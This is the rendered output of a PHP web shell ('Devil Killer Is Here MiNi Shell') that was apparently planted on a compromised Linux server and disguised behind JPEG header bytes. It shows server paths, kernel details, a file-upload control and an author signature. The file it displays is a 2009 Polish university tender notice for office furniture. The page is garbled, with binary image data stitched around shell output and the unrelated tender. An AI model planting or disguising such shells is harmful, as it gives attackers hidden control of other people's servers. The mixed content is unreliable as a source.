JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090916/157509-N-2009.html

<p class="kh_header"><b>Białystok: Przedmiotem zamówienia jest: dostawa mebli na potrzeby różnych jednostek Politechniki Białostockiej.</b><br>
<b>Numer ogłoszenia: 157509 - 2009; data zamieszczenia: 16.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika  Białostocka , ul. Wiejska 45A, 15-351 Białystok, woj. podlaskie, tel. (085) 7469750, faks (085) 7469752.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pb.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest: dostawa mebli na potrzeby różnych jednostek Politechniki Białostockiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa mebli na potrzeby różnych jednostek Politechniki Białostockiej.
 (kod wg CPV: 391300000-2 meble biurowe). 
Rodzaj mebli objętych zamówieniem określa poniższy wykaz oraz Załącznik Nr 3 (część I - V- rysunki mebli)  do SIWZ, w oparciu o które należy sporządzić ofertę. 
CZĘŚĆ I
Wydział Zarządzania - Administracja  
(ZP/WZ/D/79/09)
Meble do pomieszczenia nr 11
- biurko małe A 1200x630x760 (Rys. Nr 1) - szt. 1
- stolik pod komputer C 800x630x760 (Rys. Nr 2) - szt. 2
- stolik pod drukarkę B 630x630x650 (Rys. Nr 3) - szt. 1
- przystawka kon. ? koła 1260x1260x760 (Rys. Nr 4) - szt. 1
- kontener B 4 szuflady 490x450x670 (Rys. nr 5) - szt. 1
- szafa aktowo - odzieżowa 1000x450x1650 (Rys. nr 6) - szt. 1
- regał narożny 450x450x1650 (Rys. nr 7) - szt. 1
- fotel (Rys. Nr 8) - szt. 1

Meble do pomieszczenia nr 12
- biurko małe A 1200x630x760 (Rys. Nr 9) - szt. 3
- stolik pod komputer C 800x630x760 (Rys. Nr 10) - szt. 2
- łącznik MC do biurek 630x630x760 (Rys. Nr 11) - szt. 2
- przystawka kon. ? koła 1260x1260x760 (Rys. Nr 12) - szt. 1
- kontener B 4 szuflady  490x450x670 (Rys. Nr  13) - szt. 2
- szafa aktowo - odzieżowa 1000x450x1650 (Rys. Nr 14) - szt. 1
- regał zamykany 1000x450x904 (Rys. Nr 15) - szt. 1
- regalik narożny 450x450x904 (Rys. Nr 16) - szt.2
- fotel (Rys. Nr 17) - szt. 2


CZĘŚĆ II
Budynek Ogólnotechniczny  - Administracja
(ZP/PK/11/4/09)
- stół szkolny  (Rys. Nr  18) - szt. 25
- krzesło szkolne  (Rys. Nr 19) - szt. 50
- biurko nauczycielskie  (Rys. Nr 20) - szt. 1



CZĘŚĆ III
Budynek Ogólnotechniczny - CIiTT 
 (ZP/PR/21/20/09)
- szafa na dokumenty (Rys. Nr 21) - szt. 1
- szafa ubraniowa  (Rys. Nr 22) - szt. 1

CZĘŚĆ IV
Budynek Wydziału Mechanicznego - Dział Spraw Studenckich
 (ZP/PR/10/51/09)
- biurko narożne  (Rys. nr 23) - szt. 1
- biurko podwójne (Rys. Nr 24) - szt. 1
- szafka duża (Rys. Nr 25) - szt. 1
- szafka mała (Rys. Nr 26) - szt. 1
- regał - szafa (Rys. Nr 27) - szt. 1
- szafa wnękowa (Rys. Nr 28) - szt. 2
- szafa wnękowa (Rys. Nr 29) - szt. 2
- szafa wnękowa (Rys. Nr 30) - szt. 1
- zabudowa kaloryfera(Rys. Nr 31) - szt. 1
- zabudowa kaloryfera(Rys. Nr 32) - szt. 1

CZĘŚĆ V
Budynek Hotel Asystenta - Radio Akadera
(ZP/PR/13/2/09)
- krzesło obrotowe (Rys. Nr 32) - szt. 4

Wykonawca ma prawo przed złożeniem oferty do dokonania wizji lokalnej w pomieszczeniach celem sprawdzenia warunków techniczno-organizacyjnych realizacji zamówienia oraz pobrania wymiarów 
z natury na poszczególne meble.
Dopuszcza się złożenie oferty równoważnej o parametrach i właściwościach takich samych bądź lepszych niż określono w SIWZ.
Jakiekolwiek pojawienie się w opisie przedmiotu zamówienia nazw własnych oraz znaków towarowych ma na celu wyłącznie zapewnienie jednorodności zamawianych mebli z meblami już posiadanymi i zamontowanymi przez zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą się ubiegać wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ,  a w szczególności:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności określonej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego o osób zdolnych do wykonania zamówienia,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, określonej jako możliwość dysponowania lub dostępu do środków finansowych wystarczających do realizacji zamówienia bez udzielania zaliczki, z uwzględnieniem zobowiązań z tytułu realizacji innych zamówień,
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
5)	udzielą co najmniej 36 miesięcznej gwarancji na dostarczone i zamontowane meble, objęte zamówieniem,
6)	zaoferują meble, posiadające odpowiednie atesty, certyfikaty, aprobaty na materiały użyte do ich wykonania oraz deklaracje zgodności z normami na wyrób; odpowiednie dokumenty wykonawca przedłoży przy dostawie zamówienia, 
7)	zaakceptują warunki bezpłatnego serwisu gwarancyjnego:
a)	termin usunięcia wad przedmiotu zamówienia, w siedzibie zamawiającego - w ciągu 5 dni roboczych 
od pisemnego zgłoszenia przez zamawiającego,  
b)	jeżeli naprawa będzie trwać dłużej niż 10 dni roboczych, bądź gdy 3 naprawy dotyczyć będą tego samego wyrobu (mebla) lub jego elementów - wtedy wykonawca wymieni wyrób (mebel) na nowy, pozbawiony wad, taki sam lub inny, pasujący do reszty wyposażenia, 
c)	okres gwarancji na naprawiany wyrób (mebel) ulega przedłużeniu o czas naprawy,
d)	okres gwarancji biegnie na nowo dla wyrobu (mebla) wymienionego,
e)	zamawiający może żądać zwrotu kosztu wyrobu (mebla) - w przypadku 3 nieskutecznych napraw, bądź uchylania się wykonawcy od obowiązków świadczenia usług gwarancyjnych. 

Oceny spełnienia warunków zamawiający dokona na podstawie złożonych przez wykonawcę oświadczeń oraz dokumentów wskazanych w pkt. 6 SIWZ. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia. Niespełnienie któregokolwiek warunku spowoduje wykluczenie wykonawcy z postępowania i uznanie jego oferty za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawcy powinni załączyć do oferty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę:
1)	wypełniony Formularz ofertowy (wg załączonego wzoru  - Załącznik nr 1),
2)	wypełnioną Specyfikację ofertową zamówienia (wg załączonego wzoru - Załącznik nr 2) z odpowiednimi odnośnikami wskazującymi poszczególne meble w załączonych do oferty katalogach, prospektach, zdjęciach, rysunkach, itp.; odnośniki powinny określać: wygląd mebli, wymiary, z dodatkowym opisem zawierającym rodzaj materiałów oraz akcesoriów użytych do wykonania mebli (jeżeli nie ma takich danych w odnośnikach), ewent. inne charakterystyczne dane dotyczące zaoferowanych mebli,
3)	rysunki proponowanych mebli, katalogi, prospekty, zdjęcia, 
4)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
5)	oświadczenie, że wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, oraz nie podlega wykluczeniu wg art. 24 ust. 1 i 2 wym. ustawy (wg załączonego wzoru druku - Załącznik nr 5),
6)	oświadczenie wykonawcy o udzieleniu co najmniej 36-miesięcznej na meble oraz o akceptacji warunków serwisu gwarancyjnego zawartych w pkt. 5.7 SIWZ, (na druku Formularza oferty),
7)	oświadczenie wykonawcy o zaoferowaniu mebli posiadających odpowiednie atesty, certyfikaty, aprobaty na materiały użyte do ich wykonania oraz deklaracje zgodności z normami na wyrób z oświadczeniem, że odpowiednie dokumenty wykonawca przedłoży przy dostawie zamówienia, (na druku Formularza oferty),.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pb.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Białostocka, Dział Zamówień Publicznych, ul. Zwierzyniecka 6 pok. 4, 15-333 Białystok.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2009 godzina 09:00, miejsce: Politechnika Białostocka, Dział Zamówień Publicznych, ul. Zwierzyniecka 6 pok. 4, 15-333 Białystok.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wydział Zarządzania - Administracja  
(ZP/WZ/D/79/09).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wydział Zarządzania - Administracja  
(ZP/WZ/D/79/09)
Meble do pomieszczenia nr 11
- biurko małe A 1200x630x760 (Rys. Nr 1) - szt. 1
- stolik pod komputer C 800x630x760 (Rys. Nr 2) - szt. 2
- stolik pod drukarkę B 630x630x650 (Rys. Nr 3) - szt. 1
- przystawka kon. ? koła 1260x1260x760 (Rys. Nr 4) - szt. 1
- kontener B 4 szuflady 490x450x670 (Rys. nr 5) - szt. 1
- szafa aktowo - odzieżowa 1000x450x1650 (Rys. nr 6) - szt. 1
- regał narożny 450x450x1650 (Rys. nr 7) - szt. 1
- fotel (Rys. Nr 8) - szt. 1

Meble do pomieszczenia nr 12
- biurko małe A 1200x630x760 (Rys. Nr 9) - szt. 3
- stolik pod komputer C 800x630x760 (Rys. Nr 10) - szt. 2
- łącznik MC do biurek 630x630x760 (Rys. Nr 11) - szt. 2
- przystawka kon. ? koła 1260x1260x760 (Rys. Nr 12) - szt. 1
- kontener B 4 szuflady  490x450x670 (Rys. Nr  13) - szt. 2
- szafa aktowo - odzieżowa 1000x450x1650 (Rys. Nr 14) - szt. 1
- regał zamykany 1000x450x904 (Rys. Nr 15) - szt. 1
- regalik narożny 450x450x904 (Rys. Nr 16) - szt.2
- fotel (Rys. Nr 17) - szt. 2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budynek Ogólnotechniczny  - Administracja
(ZP/PK/11/4/09).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - stół szkolny  (Rys. Nr  18) - szt. 25
- krzesło szkolne  (Rys. Nr 19) - szt. 50
- biurko nauczycielskie  (Rys. Nr 20) - szt. 1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Budynek Ogólnotechniczny - CIiTT 
 (ZP/PR/21/20/09).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - szafa na dokumenty (Rys. Nr 21) - szt. 1
- szafa ubraniowa  (Rys. Nr 22) - szt. 1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Budynek Wydziału Mechanicznego - Dział Spraw Studenckich
 (ZP/PR/10/51/09).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - biurko narożne  (Rys. nr 23) - szt. 1
- biurko podwójne (Rys. Nr 24) - szt. 1
- szafka duża (Rys. Nr 25) - szt. 1
- szafka mała (Rys. Nr 26) - szt. 1
- regał - szafa (Rys. Nr 27) - szt. 1
- szafa wnękowa (Rys. Nr 28) - szt. 2
- szafa wnękowa (Rys. Nr 29) - szt. 2
- szafa wnękowa (Rys. Nr 30) - szt. 1
- zabudowa kaloryfera(Rys. Nr 31) - szt. 1
- zabudowa kaloryfera(Rys. Nr 32) - szt. 1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Budynek Hotel Asystenta - Radio Akadera
(ZP/PR/13/2/09).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - krzesło obrotowe (Rys. Nr 33) - szt. 4.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com